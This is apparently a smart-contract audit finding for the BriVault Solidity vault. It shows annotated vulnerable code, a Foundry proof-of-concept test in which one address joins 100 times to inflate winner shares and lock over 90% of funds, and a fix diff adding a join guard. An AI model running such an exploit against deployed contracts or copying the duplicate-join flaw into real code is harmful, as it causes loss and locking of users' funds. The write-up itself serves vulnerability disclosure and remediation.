/// @notice Registers the caller as a participant backing `teams[countryId]`.
/// @dev Requires a prior deposit (stakedAsset > 0), a valid country index, and
/// block.timestamp <= eventStartDate. Records the caller's current vault share
/// balance as their stake for that country.
/// NOTE(review): nothing here stops the same address from calling joinEvent again
/// before the event starts. Each repeat call pushes msg.sender into usersAddress again,
/// increments numberOfParticipants and re-adds the shares to totalParticipantShares,
/// while the userSharesToCountry entry is merely overwritten (see the marked lines).
/// @param countryId Index into `teams`.
function joinEvent(uint256 countryId) public {
if (stakedAsset[msg.sender] == 0) {
revert noDeposit();
}
// Valid indices are 0 .. teams.length - 1.
if (countryId >= teams.length) {
revert invalidCountry();
}
// Strict `>`: joining is still allowed at exactly eventStartDate.
if (block.timestamp > eventStartDate) {
revert eventStarted();
}
userToCountry[msg.sender] = teams[countryId];
// Snapshot of the caller's share balance at join time.
uint256 participantShares = balanceOf(msg.sender);
// Plain assignment keyed by countryId: re-joining with a *different* country leaves the
// earlier entry in place, so that country would still count these shares if it wins.
@> userSharesToCountry[msg.sender][countryId] = participantShares;
// Appended unconditionally: every repeat join adds another duplicate entry.
@> usersAddress.push(msg.sender);
numberOfParticipants++;
totalParticipantShares += participantShares;
emit joinedEvent(msg.sender, countryId);
}
/// @dev Scans every usersAddress entry and adds that user's userSharesToCountry value
/// for winnerCountryId to the totalWinnerShares storage variable, then returns it.
/// NOTE(review): totalWinnerShares is incremented here and not reset first, so a second
/// call would double-count. An address present k times in usersAddress (one entry per
/// joinEvent call) contributes its shares k times. The loop is linear in
/// usersAddress.length and unbounded.
function _getWinnerShares () internal returns (uint256) {
@> for (uint256 i = 0; i < usersAddress.length; ++i){
address user = usersAddress[i];
// Added once per entry, duplicates included.
@> totalWinnerShares += userSharesToCountry[user][winnerCountryId];
}
return totalWinnerShares;
}
/// @notice Burns all of the caller's vault shares and pays out a pro-rata slice of
/// finalizedVaultAsset, computed as shares * finalizedVaultAsset / totalWinnerShares.
/// @dev OpenZeppelin Math.mulDiv rounds down and reverts when totalWinnerShares is 0.
/// NOTE(review): the numerator is the caller's current balanceOf. The denominator is built
/// from join-time snapshots summed per usersAddress entry. When duplicate entries inflate
/// the denominator, every payout shrinks and the difference stays in the vault.
/// This excerpt shows no check that the caller backed the winning country; confirm against
/// the full contract and the winnerSet modifier.
function withdraw() external winnerSet {
uint256 shares = balanceOf(msg.sender);
uint256 vaultAsset = finalizedVaultAsset;
@> uint256 assetToWithdraw = Math.mulDiv(shares, vaultAsset, totalWinnerShares);
// Shares are burned before the token transfer out.
_burn(msg.sender, shares);
IERC20(asset()).safeTransfer(msg.sender, assetToWithdraw);
}
pragma solidity ^0.8.24;
import {Test, console} from "forge-std/Test.sol";
import {BriVault} from "../src/BriVault.sol";
import {ERC20Mock} from "@openzeppelin/contracts/mocks/token/ERC20Mock.sol";
/// @notice Proof of concept: repeated joinEvent calls by one address inflate
/// totalWinnerShares, shrinking every winner's payout and leaving most assets in the vault.
contract MultipleJoinTest is Test {
    BriVault public vault;
    ERC20Mock public asset;

    address public owner = makeAddr("owner");
    address public feeAddress = makeAddr("feeAddress");
    address public alice = makeAddr("alice");
    address public bob = makeAddr("bob");

    /// @dev Amount each participant is minted and then deposits.
    uint256 internal constant STAKE = 1000 * 10 ** 18;
    /// @dev Number of times alice calls joinEvent for the same country.
    uint256 internal constant ALICE_JOINS = 100;

    function setUp() public {
        asset = new ERC20Mock();

        // As the owner: deploy the vault and register a single country at index 0.
        vm.startPrank(owner);
        vault = new BriVault(
            asset,
            300,
            block.timestamp + 1 days,
            feeAddress,
            10 * 10 ** 18,
            block.timestamp + 30 days
        );
        string[48] memory countries;
        countries[0] = "Team A";
        vault.setCountry(countries);
        vm.stopPrank();

        asset.mint(alice, STAKE);
        asset.mint(bob, STAKE);
        _approveAndDeposit(alice);
        _approveAndDeposit(bob);
    }

    function testMultipleJoinInflatesTotalWinnerShares() public {
        // bob joins once; alice joins the same country ALICE_JOINS times.
        vm.prank(bob);
        vault.joinEvent(0);

        vm.startPrank(alice);
        for (uint256 round; round < ALICE_JOINS; ++round) {
            vault.joinEvent(0);
        }
        vm.stopPrank();

        // Warp past the last timestamp given to the constructor (presumably the
        // event end), then have the owner declare country 0 the winner.
        vm.warp(block.timestamp + 31 days);
        vm.prank(owner);
        vault.setWinner(0);

        uint256 winnerTotal = vault.totalWinnerShares();
        uint256 aliceBalance = vault.balanceOf(alice);
        uint256 bobBalance = vault.balanceOf(bob);
        uint256 finalized = vault.finalizedVaultAsset();

        assertGt(winnerTotal, aliceBalance + bobBalance, "totalWinnerShares inflated");

        // With equal deposits each winner is entitled to half of the vault; both payouts
        // (shares * finalized / winnerTotal) land below a tenth of that half.
        uint256 tenthOfFairShare = (finalized / 2) / 10;
        assertLt((aliceBalance * finalized) / winnerTotal, tenthOfFairShare, "Alice gets <10% of fair share");
        assertLt((bobBalance * finalized) / winnerTotal, tenthOfFairShare, "Bob gets <10% of fair share");

        vm.prank(alice);
        vault.withdraw();
        vm.prank(bob);
        vault.withdraw();

        // Even after both winners withdraw, more than 90% of the finalized assets remain.
        assertGt(asset.balanceOf(address(vault)), finalized * 90 / 100, "90%+ of funds locked");
    }

    /// @dev Acting as `user`, grants the vault an unlimited allowance and deposits STAKE.
    function _approveAndDeposit(address user) internal {
        vm.startPrank(user);
        asset.approve(address(vault), type(uint256).max);
        vault.deposit(STAKE, user);
        vm.stopPrank();
    }
}
+ /// @notice True once an address has called joinEvent; used to reject repeat joins.
+ mapping(address => bool) public hasJoined;
+ /// @notice Thrown when an address that has already joined calls joinEvent again.
+ error alreadyJoined();
+ /// @notice Registers the caller, at most once, as a participant backing `teams[countryId]`.
+ /// @param countryId Index into `teams`.
function joinEvent(uint256 countryId) public {
if (stakedAsset[msg.sender] == 0) {
revert noDeposit();
}
+ // Without this guard each call re-pushes msg.sender into usersAddress, and
+ // _getWinnerShares then counts the caller's shares once per entry.
+ // A custom error matches the contract's existing noDeposit/invalidCountry/eventStarted style.
+ if (hasJoined[msg.sender]) {
+ revert alreadyJoined();
+ }
if (countryId >= teams.length) {
revert invalidCountry();
}
if (block.timestamp > eventStartDate) {
revert eventStarted();
}
userToCountry[msg.sender] = teams[countryId];
uint256 participantShares = balanceOf(msg.sender);
userSharesToCountry[msg.sender][countryId] = participantShares;
usersAddress.push(msg.sender);
+ hasJoined[msg.sender] = true;
+ // NOTE(review): any path that removes a participant (e.g. a cancel/refund before
+ // the event) must also clear hasJoined and the usersAddress entry.
numberOfParticipants++;
totalParticipantShares += participantShares;
emit joinedEvent(msg.sender, countryId);
}